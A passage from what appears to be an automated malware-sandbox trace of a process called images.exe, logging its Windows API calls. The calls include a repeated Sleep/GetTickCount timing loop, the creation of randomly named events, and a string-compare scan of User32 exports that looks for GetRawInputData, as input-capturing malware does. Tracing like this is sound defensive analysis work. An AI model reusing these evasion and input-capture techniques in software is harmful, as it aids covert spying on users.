0x10 [0172.636] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614bf0 | out: hHeap=0x600000) returned 1 [0172.637] exit (_Code=1) Thread: id = 165 os_tid = 0x5e0 Process: id = "15" image_name = "images.exe" filename = "c:\\programdata\\images.exe" page_root = "0x6b8dd000" os_pid = "0x6e0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x530" cmd_line = "\"{path}\"" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 166 os_tid = 0x6b8 [0174.142] GetCommandLineA () returned="\"{path}\"" [0174.142] GetStartupInfoA (in: lpStartupInfo=0x2aff3c | out: lpStartupInfo=0x2aff3c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0174.142] GetProcessHeap () returned 0x620000 [0174.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x80) returned 0x63e608 [0174.242] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0xb8 [0174.242] GetProcessHeap () returned 0x620000 [0174.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x6326f0 [0174.286] GetProcessHeap () returned 0x620000 [0174.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x632730 [0174.286] GetProcessHeap () returned 0x620000 [0174.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x63d158 [0174.286] GetProcessHeap () returned 0x620000 [0174.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x50) returned 0x63e690 [0174.287] GetProcessHeap () returned 0x620000 [0174.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa0) returned 0x63e6e8 [0174.287] CoInitialize (pvReserved=0x0) returned 0x0 [0174.300] CoCreateInstance (in: rclsid=0x4135d0*(Data1=0x62be5d10, Data2=0x60eb, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x416314*(Data1=0x29840822, Data2=0x5b84, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppv=0x2afef8 | out: ppv=0x2afef8*=0x18f610) returned 0x0 [0174.385] SystemDeviceEnum:ICreateDevEnum:CreateClassEnumerator (in: This=0x18f610, clsidDeviceClass=0x4135c0*(Data1=0x860bb310, Data2=0x5d01, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppenumMoniker=0x2afefc, dwFlags=0x0 | out: ppenumMoniker=0x2afefc*=0x0) returned 0x1 [0174.535] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0174.536] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x170000 [0174.536] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x190000 [0174.536] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x1a0000 [0174.537] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0174.537] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2c0000 [0174.537] GetProcessHeap () returned 0x620000 [0174.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x19) returned 0x646a40 [0174.537] GetProcessHeap () returned 0x620000 [0174.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x19) returned 0x653f60 [0174.537] GetProcessHeap () returned 0x620000 [0174.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x19) returned 0x654208 [0174.537] GetProcessHeap () returned 0x620000 [0174.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x19) returned 0x6541e0 [0174.537] GetProcessHeap () returned 0x620000 [0174.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x19) returned 0x6541b8 [0174.537] GetProcessHeap () returned 0x620000 [0174.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x19) returned 0x654190 [0174.537] Sleep (dwMilliseconds=0x1) [0174.549] GetTickCount () returned 0x113a3de [0174.549] Sleep (dwMilliseconds=0x1) [0174.567] GetTickCount () returned 0x113a3ee [0174.567] Sleep (dwMilliseconds=0x1) [0174.580] GetTickCount () returned 0x113a3fd [0174.580] Sleep (dwMilliseconds=0x1) [0174.596] GetTickCount () returned 0x113a40d [0174.596] Sleep (dwMilliseconds=0x1) [0174.611] GetTickCount () returned 0x113a41c [0174.611] Sleep (dwMilliseconds=0x1) [0174.627] GetTickCount () returned 0x113a42c [0174.627] Sleep (dwMilliseconds=0x1) [0174.642] GetTickCount () returned 0x113a43c [0174.642] Sleep (dwMilliseconds=0x1) [0174.658] GetTickCount () returned 0x113a44b [0174.658] Sleep (dwMilliseconds=0x1) [0174.674] GetTickCount () returned 0x113a45b [0174.674] Sleep (dwMilliseconds=0x1) [0174.689] GetTickCount () returned 0x113a46a [0174.689] Sleep (dwMilliseconds=0x1) [0174.705] GetTickCount () returned 0x113a47a [0174.705] Sleep (dwMilliseconds=0x1) [0174.720] GetTickCount () returned 0x113a48a [0174.720] Sleep (dwMilliseconds=0x1) [0174.736] GetTickCount () returned 0x113a499 [0174.736] Sleep (dwMilliseconds=0x1) [0174.752] GetTickCount () returned 0x113a4a9 [0174.752] Sleep (dwMilliseconds=0x1) [0174.767] GetTickCount () returned 0x113a4b8 [0174.767] Sleep (dwMilliseconds=0x1) [0174.785] GetTickCount () returned 0x113a4c8 [0174.785] Sleep (dwMilliseconds=0x1) [0174.805] GetTickCount () returned 0x113a4d8 [0174.805] Sleep (dwMilliseconds=0x1) [0174.814] GetTickCount () returned 0x113a4e7 [0174.814] Sleep (dwMilliseconds=0x1) [0174.830] GetTickCount () returned 0x113a4f7 [0174.830] Sleep (dwMilliseconds=0x1) [0174.845] GetTickCount () returned 0x113a506 [0174.845] Sleep (dwMilliseconds=0x1) [0174.861] GetTickCount () returned 0x113a516 [0174.861] Sleep (dwMilliseconds=0x1) [0174.877] GetTickCount () returned 0x113a526 [0174.877] Sleep (dwMilliseconds=0x1) [0174.892] GetTickCount () returned 0x113a535 [0174.892] Sleep (dwMilliseconds=0x1) [0174.908] GetTickCount () returned 0x113a545 [0174.908] Sleep (dwMilliseconds=0x1) [0174.923] GetTickCount () returned 0x113a554 [0174.923] Sleep (dwMilliseconds=0x1) [0174.939] GetTickCount () returned 0x113a564 [0174.939] Sleep (dwMilliseconds=0x1) [0174.968] GetTickCount () returned 0x113a574 [0174.968] Sleep (dwMilliseconds=0x1) [0174.970] GetTickCount () returned 0x113a583 [0174.970] Sleep (dwMilliseconds=0x1) [0174.986] GetTickCount () returned 0x113a593 [0174.986] Sleep (dwMilliseconds=0x1) [0175.001] GetTickCount () returned 0x113a5a2 [0175.001] Sleep (dwMilliseconds=0x1) [0175.017] GetTickCount () returned 0x113a5b2 [0175.017] Sleep (dwMilliseconds=0x1) [0175.033] GetTickCount () returned 0x113a5c2 [0175.033] Sleep (dwMilliseconds=0x1) [0175.048] GetTickCount () returned 0x113a5d1 [0175.048] Sleep (dwMilliseconds=0x1) [0175.064] GetTickCount () returned 0x113a5e1 [0175.064] Sleep (dwMilliseconds=0x1) [0175.081] GetTickCount () returned 0x113a5f0 [0175.081] Sleep (dwMilliseconds=0x1) [0175.095] GetTickCount () returned 0x113a600 [0175.095] Sleep (dwMilliseconds=0x1) [0175.112] GetTickCount () returned 0x113a610 [0175.112] Sleep (dwMilliseconds=0x1) [0175.126] GetTickCount () returned 0x113a61f [0175.126] Sleep (dwMilliseconds=0x1) [0175.142] GetTickCount () returned 0x113a62f [0175.142] Sleep (dwMilliseconds=0x1) [0175.157] GetTickCount () returned 0x113a63e [0175.157] Sleep (dwMilliseconds=0x1) [0175.173] GetTickCount () returned 0x113a64e [0175.173] Sleep (dwMilliseconds=0x1) [0175.189] GetTickCount () returned 0x113a65e [0175.189] Sleep (dwMilliseconds=0x1) [0175.204] GetTickCount () returned 0x113a66d [0175.204] Sleep (dwMilliseconds=0x1) [0175.219] GetTickCount () returned 0x113a67d [0175.220] Sleep (dwMilliseconds=0x1) [0175.235] GetTickCount () returned 0x113a68c [0175.235] Sleep (dwMilliseconds=0x1) [0175.251] GetTickCount () returned 0x113a69c [0175.251] Sleep (dwMilliseconds=0x1) [0175.267] GetTickCount () returned 0x113a6ac [0175.267] Sleep (dwMilliseconds=0x1) [0175.282] GetTickCount () returned 0x113a6bb [0175.282] Sleep (dwMilliseconds=0x1) [0175.298] GetTickCount () returned 0x113a6cb [0175.298] Sleep (dwMilliseconds=0x1) [0175.313] GetTickCount () returned 0x113a6da [0175.313] Sleep (dwMilliseconds=0x1) [0175.329] GetTickCount () returned 0x113a6ea [0175.329] Sleep (dwMilliseconds=0x1) [0175.348] GetTickCount () returned 0x113a6fa [0175.348] Sleep (dwMilliseconds=0x1) [0175.361] GetTickCount () returned 0x113a709 [0175.361] Sleep (dwMilliseconds=0x1) [0175.407] GetTickCount () returned 0x113a738 [0175.407] Sleep (dwMilliseconds=0x1) [0175.422] GetTickCount () returned 0x113a748 [0175.422] Sleep (dwMilliseconds=0x1) [0175.438] GetTickCount () returned 0x113a757 [0175.438] Sleep (dwMilliseconds=0x1) [0175.454] GetTickCount () returned 0x113a767 [0175.454] Sleep (dwMilliseconds=0x1) [0175.481] GetTickCount () returned 0x113a776 [0175.481] Sleep (dwMilliseconds=0x1) [0175.485] GetTickCount () returned 0x113a786 [0175.485] Sleep (dwMilliseconds=0x1) [0175.501] GetTickCount () returned 0x113a796 [0175.501] lstrlenA (lpString="AmnmWCiohW") returned 10 [0175.501] lstrlenA (lpString="AmnmWCiohW") returned 10 [0175.501] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.501] lstrcpyA (in: lpString1=0x310000, lpString2="AmnmWCiohW" | out: lpString1="AmnmWCiohW") returned="AmnmWCiohW" [0175.501] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.502] lstrlenA (lpString="AmnmWCiohW") returned 10 [0175.502] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0175.502] lstrcatA (in: lpString1="", lpString2="AmnmWCiohW" | out: lpString1="AmnmWCiohW") returned="AmnmWCiohW" [0175.502] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="AmnmWCiohW") returned 0x144 [0175.502] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.502] lstrlenA (lpString="gqPeeswaj6") returned 10 [0175.502] lstrlenA (lpString="gqPeeswaj6") returned 10 [0175.502] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.503] lstrcpyA (in: lpString1=0x310000, lpString2="gqPeeswaj6" | out: lpString1="gqPeeswaj6") returned="gqPeeswaj6" [0175.503] VirtualFree (lpAddress=0x170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.503] lstrlenA (lpString="gqPeeswaj6") returned 10 [0175.503] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x170000 [0175.503] lstrcatA (in: lpString1="", lpString2="gqPeeswaj6" | out: lpString1="gqPeeswaj6") returned="gqPeeswaj6" [0175.503] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="gqPeeswaj6") returned 0x148 [0175.503] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.503] lstrlenA (lpString="CcjW4YA4lg") returned 10 [0175.503] lstrlenA (lpString="CcjW4YA4lg") returned 10 [0175.503] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.504] lstrcpyA (in: lpString1=0x310000, lpString2="CcjW4YA4lg" | out: lpString1="CcjW4YA4lg") returned="CcjW4YA4lg" [0175.504] VirtualFree (lpAddress=0x190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.504] lstrlenA (lpString="CcjW4YA4lg") returned 10 [0175.504] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x190000 [0175.504] lstrcatA (in: lpString1="", lpString2="CcjW4YA4lg" | out: lpString1="CcjW4YA4lg") returned="CcjW4YA4lg" [0175.504] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="CcjW4YA4lg") returned 0x188 [0175.504] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.505] lstrlenA (lpString="ig3OCEOq5y") returned 10 [0175.505] lstrlenA (lpString="ig3OCEOq5y") returned 10 [0175.505] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.505] lstrcpyA (in: lpString1=0x310000, lpString2="ig3OCEOq5y" | out: lpString1="ig3OCEOq5y") returned="ig3OCEOq5y" [0175.505] VirtualFree (lpAddress=0x1a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.505] lstrlenA (lpString="ig3OCEOq5y") returned 10 [0175.505] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x1a0000 [0175.506] lstrcatA (in: lpString1="", lpString2="ig3OCEOq5y" | out: lpString1="ig3OCEOq5y") returned="ig3OCEOq5y" [0175.506] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="ig3OCEOq5y") returned 0x18c [0175.506] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.506] lstrlenA (lpString="EkNycuKK7Y") returned 10 [0175.506] lstrlenA (lpString="EkNycuKK7Y") returned 10 [0175.506] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.506] lstrcpyA (in: lpString1=0x310000, lpString2="EkNycuKK7Y" | out: lpString1="EkNycuKK7Y") returned="EkNycuKK7Y" [0175.506] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.507] lstrlenA (lpString="EkNycuKK7Y") returned 10 [0175.507] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0175.507] lstrcatA (in: lpString1="", lpString2="EkNycuKK7Y" | out: lpString1="EkNycuKK7Y") returned="EkNycuKK7Y" [0175.507] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EkNycuKK7Y") returned 0x190 [0175.507] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.507] lstrlenA (lpString="kWhWMoPaGI") returned 10 [0175.507] lstrlenA (lpString="kWhWMoPaGI") returned 10 [0175.507] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0175.508] lstrcpyA (in: lpString1=0x310000, lpString2="kWhWMoPaGI" | out: lpString1="kWhWMoPaGI") returned="kWhWMoPaGI" [0175.508] VirtualFree (lpAddress=0x2c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.508] lstrlenA (lpString="kWhWMoPaGI") returned 10 [0175.508] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x2c0000 [0175.508] lstrcatA (in: lpString1="", lpString2="kWhWMoPaGI" | out: lpString1="kWhWMoPaGI") returned="kWhWMoPaGI" [0175.508] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="kWhWMoPaGI") returned 0x194 [0175.508] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.539] GetProcessHeap () returned 0x620000 [0175.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x656ab8 [0175.571] GetProcessHeap () returned 0x620000 [0175.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7c) returned 0x65af60 [0175.571] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x198 [0175.571] LoadLibraryW (lpLibFileName="User32.dll") returned 0x75b00000 [0175.599] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="GetRawInputData") returned -1 [0175.599] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="GetRawInputData") returned -1 [0175.599] lstrcmpA (lpString1="AdjustWindowRect", lpString2="GetRawInputData") returned -1 [0175.599] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="GetRawInputData") returned -1 [0175.599] lstrcmpA (lpString1="AlignRects", lpString2="GetRawInputData") returned -1 [0175.599] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="GetRawInputData") returned -1 [0175.599] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="GetRawInputData") returned -1 [0175.599] lstrcmpA (lpString1="AnimateWindow", lpString2="GetRawInputData") returned -1 [0175.599] lstrcmpA (lpString1="AnyPopup", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="AppendMenuA", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="AppendMenuW", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="AttachThreadInput", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="BeginPaint", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="BlockInput", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="BringWindowToTop", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="BuildReasonArray", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="CalcMenuBar", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="CalculatePopupWindowPosition", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="CallMsgFilter", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="CallMsgFilterA", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="CallMsgFilterW", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="CallNextHookEx", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="CallWindowProcA", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="CallWindowProcW", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="CancelShutdown", lpString2="GetRawInputData") returned -1 [0175.600] lstrcmpA (lpString1="CascadeChildWindows", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CascadeWindows", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="ChangeClipboardChain", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="ChangeDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="ChangeDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="ChangeDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="ChangeDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="ChangeMenuA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="ChangeMenuW", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="ChangeWindowMessageFilter", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="ChangeWindowMessageFilterEx", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharLowerA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharLowerBuffA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharLowerBuffW", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharLowerW", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharNextA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharNextExA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharNextW", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharPrevA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharPrevExA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharPrevW", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharToOemA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharToOemBuffA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharToOemBuffW", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharToOemW", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharUpperA", lpString2="GetRawInputData") returned -1 [0175.601] lstrcmpA (lpString1="CharUpperBuffA", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CharUpperBuffW", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CharUpperW", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CheckDesktopByThreadId", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CheckDlgButton", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CheckMenuItem", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CheckMenuRadioItem", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CheckRadioButton", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CheckWindowThreadDesktop", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="ChildWindowFromPoint", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="ChildWindowFromPointEx", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CliImmSetHotKey", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="ClientThreadSetup", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="ClientToScreen", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="ClipCursor", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CloseClipboard", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CloseDesktop", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CloseGestureInfoHandle", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CloseTouchInputHandle", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CloseWindow", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CloseWindowStation", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="ConsoleControl", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="ControlMagnification", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CopyAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CopyAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CopyIcon", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CopyImage", lpString2="GetRawInputData") returned -1 [0175.602] lstrcmpA (lpString1="CopyRect", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CountClipboardFormats", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateCaret", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateCursor", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateDesktopA", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateDesktopExA", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateDesktopExW", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateDesktopW", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateDialogIndirectParamA", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateDialogIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateDialogIndirectParamW", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateDialogParamA", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateDialogParamW", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateIcon", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateIconFromResource", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateIconFromResourceEx", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateIconIndirect", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateMDIWindowA", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateMDIWindowW", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateMenu", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreatePopupMenu", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateSystemThreads", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateWindowExA", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateWindowExW", lpString2="GetRawInputData") returned -1 [0175.603] lstrcmpA (lpString1="CreateWindowStationA", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="CreateWindowStationW", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="CsrBroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="CtxInitUser32", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeAbandonTransaction", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeAccessData", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeAddData", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeClientTransaction", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeCmpStringHandles", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeConnect", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeConnectList", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeCreateDataHandle", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeCreateStringHandleA", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeCreateStringHandleW", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeDisconnect", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA (lpString1="DdeDisconnectList", lpString2="GetRawInputData") returned -1 [0175.604] lstrcmpA 